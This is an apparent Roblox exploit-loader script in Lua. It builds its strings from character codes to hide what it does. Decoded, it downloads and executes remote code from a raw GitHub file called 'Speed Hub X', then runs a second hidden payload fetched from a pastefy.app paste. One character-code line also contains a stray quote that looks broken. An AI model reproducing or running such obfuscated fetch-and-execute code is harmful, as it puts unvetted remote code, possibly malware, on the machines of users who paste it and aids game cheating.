
--Swiss' script. Do not change anything as it will lose it functionality.
local a = string.char
local b = a(108)..a(111)..a(97)..a(100)..a(115)..a(116)..a(114)..a(105)..a(110)..a(103)
local c = a(103)..a(97)..a(109)..a(101)
local d = a(72)..a(116)..a(116)..a(112)..a(71)..a(101)..a(116)
local e = a(104)..a(116)..a(116)..a(112)..a(115)..a(58)..a(47)..a(47)
         ..a(114)..a(97)..a(119)..a(46)..a(103)..a(105)..a(116)..a(104)..a(117)
         ..a(98)..a(117)..a(115)..a(101)..a(114)..a(99)..a(111)..a(110)..a(116)
         ..a(101)..a(110)..a(116)..a(46)..a(99)..a(111)..a(109)..a(47)
         ..a(65)..a(104)..a(109)..a(97)..a(100)..a(86)..a(57)..a(57)
         ..a(47)..a(83)..a(112)..a(101)..a(101)..a(100)..a(45)..a(72)
         ..a(117)..a(98)..a(45)..a(88)..a(47)..a(109)..a(97)..a(105)
         ..a(110)..a(47)..a(83)..a(112)..a(101)..a(101)..a(100)..a(37)
         ..a(50)..a(48)..a(72)..a(117)..a(98)..a(37)..a(50)..a(48)
         ..a(88)..a(46)..a(108)..a(117)..a(97")
getfenv()[b](getfenv()[c][d](getfenv()[c], e, true))()
loadstring(game[("\72\116\116\112\71\101\116")](("\104\116\116\112\115\58\47\47\112\97\115\116\101\102\121\46\97\112\112\47\82\97\81\55\120\48\114\78\47\114\97\119")))()
